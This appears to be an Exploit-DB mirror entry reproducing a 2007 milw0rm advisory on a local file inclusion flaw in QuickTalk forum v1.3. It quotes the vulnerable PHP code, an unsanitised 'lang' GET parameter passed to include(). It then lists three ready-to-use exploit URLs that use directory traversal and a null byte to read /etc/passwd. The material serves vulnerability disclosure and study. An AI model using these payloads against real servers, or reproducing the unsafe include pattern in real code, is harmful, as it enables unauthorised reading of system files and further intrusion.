exploit-db-mirror/exploits/php/webapps/4115.txt
Offensive Security d304cc3d3e DB: 2017-11-24
116602 new exploits

Too many to list!
2017-11-24 20:56:23 +00:00

19 lines
No EOL
596 B
Text

###QuickTalk forum v1.3 Local File Inclusion###
#download: http://www.qt-cute.org/download/qtf13.zip
#found by: katatafish (karatatata@hush.com)
#vulncode:
$strLang = $_GET["lang"];
include("language/$strLang/qtf_lang_reg.inc");
#exploits:
http://www.site.com/[path]/qtf_checkname.php?lang=./../../../../../../../../../../etc/passwd%00
http://www.site.com/[path]/qtf_j_birth.php?lang=./../../../../../../../../../../etc/passwd%00
http://www.site.com/[path]/qtf_j_exists.php?lang=./../../../../../../../../../../etc/passwd%00
#thanks:str0ke
# milw0rm.com [2007-06-27]